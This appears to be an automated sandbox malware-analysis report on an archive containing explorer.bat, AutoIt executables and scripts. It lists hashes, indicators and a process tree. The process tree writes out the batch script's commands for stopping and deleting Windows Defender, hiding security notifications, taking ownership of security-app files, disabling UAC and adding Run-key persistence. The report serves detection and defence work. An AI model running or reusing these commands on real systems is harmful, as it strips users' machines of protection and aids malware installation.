Overview
overview
10Static
static
A3X32.exe
windows7-x64
3A3X32.exe
windows10-2004-x64
3A3X64.exe
windows7-x64
3A3X64.exe
windows10-2004-x64
3explorer.bat
windows7-x64
10explorer.bat
windows10-2004-x64
10start.bat
windows7-x64
10start.bat
windows10-2004-x64
10start.vbs
windows7-x64
10start.vbs
windows10-2004-x64
10tweak.exe
windows7-x64
1tweak.exe
windows10-2004-x64
1Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
05-12-2022 08:57
Static task
static1
Behavioral task
behavioral1
Sample
A3X32.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
A3X32.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
A3X64.exe
Resource
win7-20221111-en
Behavioral task
behavioral4
Sample
A3X64.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
explorer.bat
Resource
win7-20220901-en
Behavioral task
behavioral6
Sample
explorer.bat
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
start.bat
Resource
win7-20221111-en
Behavioral task
behavioral8
Sample
start.bat
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
start.vbs
Resource
win7-20221111-en
Behavioral task
behavioral10
Sample
start.vbs
Resource
win10v2004-20221111-en
Behavioral task
behavioral11
Sample
tweak.exe
Resource
win7-20221111-en
Behavioral task
behavioral12
Sample
tweak.exe
Resource
win10v2004-20220812-en
General
-
Target
explorer.bat
-
Size
7KB
-
MD5
0d5a78797b5c0e87df9ad300551774f5
-
SHA1
28ffaa6885bc56f07d90d40cb442e486052e0e6d
-
SHA256
b2bd6bb09c2ebb01dd9743ff18ed43e1449596057851c0cb39f2212b9e56fc69
-
SHA512
9a4f3336088ad2e1a4f14770eb08d64fb19105d3bfc8dc78302ae36a59207568523565537682774a1432742bd2db1756347f6e276a16d03aadf9c521293e1cda
-
SSDEEP
96:OY7YCf1bFydggdgjdgHg4NgNNg49g9jHmhPqzKoBrN9bvKet/h9v7n6tbOkTdnMF:pEyNOA4qNq469jiNudrMKJ
Malware Config
Signatures
-
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Processes:
X3A.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths X3A.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes X3A.exe -
Creates new service(s) 1 TTPs
-
Disables taskbar notifications via registry modification
-
Executes dropped EXE 3 IoCs
Processes:
dismhost.exetweak.exeX3A.exepid process 468 dismhost.exe 1744 tweak.exe 552 X3A.exe -
Modifies Windows Firewall 1 TTPs 21 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 452 netsh.exe 1628 netsh.exe 1944 netsh.exe 284 netsh.exe 1976 netsh.exe 920 netsh.exe 960 netsh.exe 1732 netsh.exe 1716 netsh.exe 1912 netsh.exe 956 netsh.exe 428 netsh.exe 1384 netsh.exe 1256 netsh.exe 1744 netsh.exe 996 netsh.exe 1584 netsh.exe 1316 netsh.exe 856 netsh.exe 1788 netsh.exe 664 netsh.exe -
Possible privilege escalation attempt 6 IoCs
Processes:
icacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exepid process 1780 icacls.exe 1980 takeown.exe 1716 takeown.exe 1200 takeown.exe 1868 icacls.exe 1384 icacls.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 34 IoCs
Processes:
Dism.exedismhost.execmd.exepid process 1176 Dism.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 468 dismhost.exe 1632 cmd.exe -
Modifies file permissions 1 TTPs 6 IoCs
Processes:
takeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 1980 takeown.exe 1716 takeown.exe 1200 takeown.exe 1868 icacls.exe 1384 icacls.exe 1780 icacls.exe -
Processes:
X3A.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths X3A.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions X3A.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes X3A.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
X3A.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run X3A.exe Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\X3A = "C:\\Users\\Admin\\AppData\\Roaming\\explorer\\X3A.exe /AutoIt3ExecuteScript C:\\Users\\Admin\\AppData\\Roaming\\explorer\\explorer.cfg" X3A.exe -
Processes:
X3A.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA X3A.exe -
Drops file in Windows directory 2 IoCs
Processes:
dismhost.exeDism.exedescription ioc process File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2028 sc.exe 624 sc.exe 1540 sc.exe 1956 sc.exe 1708 sc.exe 1264 sc.exe 2020 sc.exe 1764 sc.exe 1584 sc.exe 1124 sc.exe 1816 sc.exe 1164 sc.exe 1936 sc.exe 560 sc.exe -
Processes:
X3A.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 X3A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 X3A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 X3A.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 X3A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 X3A.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 X3A.exe -
NTFS ADS 1 IoCs
Processes:
X3A.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\explorer\winmgmts:\root\CIMV2 X3A.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeX3A.exepid process 1064 powershell.exe 552 X3A.exe 552 X3A.exe 1704 -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
Dism.exetakeown.exetakeown.exetakeown.exepowershell.exetweak.exedescription pid process Token: SeBackupPrivilege 1176 Dism.exe Token: SeRestorePrivilege 1176 Dism.exe Token: SeTakeOwnershipPrivilege 1980 takeown.exe Token: SeTakeOwnershipPrivilege 1716 takeown.exe Token: SeTakeOwnershipPrivilege 1200 takeown.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeTakeOwnershipPrivilege 1744 tweak.exe Token: SeDebugPrivilege 1704 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.execmd.exeDism.exedescription pid process target process PID 1632 wrote to memory of 1264 1632 cmd.exe reg.exe PID 1632 wrote to memory of 1264 1632 cmd.exe reg.exe PID 1632 wrote to memory of 1264 1632 cmd.exe reg.exe PID 1632 wrote to memory of 2012 1632 cmd.exe findstr.exe PID 1632 wrote to memory of 2012 1632 cmd.exe findstr.exe PID 1632 wrote to memory of 2012 1632 cmd.exe findstr.exe PID 1632 wrote to memory of 2040 1632 cmd.exe cmd.exe PID 1632 wrote to memory of 2040 1632 cmd.exe cmd.exe PID 1632 wrote to memory of 2040 1632 cmd.exe cmd.exe PID 2040 wrote to memory of 2028 2040 cmd.exe reg.exe PID 2040 wrote to memory of 2028 2040 cmd.exe reg.exe PID 2040 wrote to memory of 2028 2040 cmd.exe reg.exe PID 2040 wrote to memory of 1976 2040 cmd.exe findstr.exe PID 2040 wrote to memory of 1976 2040 cmd.exe findstr.exe PID 2040 wrote to memory of 1976 2040 cmd.exe findstr.exe PID 1632 wrote to memory of 560 1632 cmd.exe cmd.exe PID 1632 wrote to memory of 560 1632 cmd.exe cmd.exe PID 1632 wrote to memory of 560 1632 cmd.exe cmd.exe PID 560 wrote to memory of 1176 560 cmd.exe Dism.exe PID 560 wrote to memory of 1176 560 cmd.exe Dism.exe PID 560 wrote to memory of 1176 560 cmd.exe Dism.exe PID 560 wrote to memory of 1100 560 cmd.exe findstr.exe PID 560 wrote to memory of 1100 560 cmd.exe findstr.exe PID 560 wrote to memory of 1100 560 cmd.exe findstr.exe PID 1176 wrote to memory of 468 1176 Dism.exe dismhost.exe PID 1176 wrote to memory of 468 1176 Dism.exe dismhost.exe PID 1176 wrote to memory of 468 1176 Dism.exe dismhost.exe PID 1632 wrote to memory of 1044 1632 cmd.exe reg.exe PID 1632 wrote to memory of 1044 1632 cmd.exe reg.exe PID 1632 wrote to memory of 1044 1632 cmd.exe reg.exe PID 1632 wrote to memory of 1296 1632 cmd.exe reg.exe PID 1632 wrote to memory of 1296 1632 cmd.exe reg.exe PID 1632 wrote to memory of 1296 1632 cmd.exe reg.exe PID 1632 wrote to memory of 956 1632 cmd.exe reg.exe PID 1632 wrote to memory of 956 1632 cmd.exe reg.exe PID 1632 wrote to memory of 956 1632 cmd.exe reg.exe PID 1632 wrote to memory of 1980 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1980 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1980 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1716 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1716 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1716 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1200 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1200 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1200 1632 cmd.exe takeown.exe PID 1632 wrote to memory of 1868 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1868 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1868 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1384 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1384 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1384 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1780 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1780 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1780 1632 cmd.exe icacls.exe PID 1632 wrote to memory of 1708 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1708 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1708 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1124 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1124 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1124 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1264 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1264 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1264 1632 cmd.exe sc.exe PID 1632 wrote to memory of 1072 1632 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\explorer.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\findstr.exefindstr /c:Defender2⤵PID:2012
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages"2⤵PID:1264
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" | findstr /c:Defender2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages"3⤵PID:2028
-
C:\Windows\system32\findstr.exefindstr /c:Defender3⤵PID:1976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dism /online /get-packages | findstr /c:Defender2⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\system32\Dism.exedism /online /get-packages3⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\5B320139-34B0-453B-A7AA-C2D64B84BAE0\dismhost.exeC:\Users\Admin\AppData\Local\Temp\5B320139-34B0-453B-A7AA-C2D64B84BAE0\dismhost.exe {E2FC47A6-A693-4A6A-8748-1742403E8D90}4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:468 -
C:\Windows\system32\findstr.exefindstr /c:Defender3⤵PID:1100
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility /t REG_SZ /d "hide:windowsdefender" /f2⤵PID:1044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t "REG_DWORD" /d 1 /f2⤵PID:1296
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v Enabled /t REG_DWORD /d 0 /f2⤵PID:956
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1980 -
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Assets"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\pris"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1200 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy" /grant Admin:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1868 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Assets" /grant Admin:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1384 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\pris" /grant Admin:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1780 -
C:\Windows\system32\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:1708 -
C:\Windows\system32\sc.exesc stop windefend2⤵
- Launches sc.exe
PID:1124 -
C:\Windows\system32\sc.exesc delete windefend2⤵
- Launches sc.exe
PID:1264 -
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t "REG_DWORD" /d 0x1 /f2⤵PID:1072
-
C:\Windows\system32\reg.exereg ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t "REG_DWORD" /d 0 /f2⤵PID:2032
-
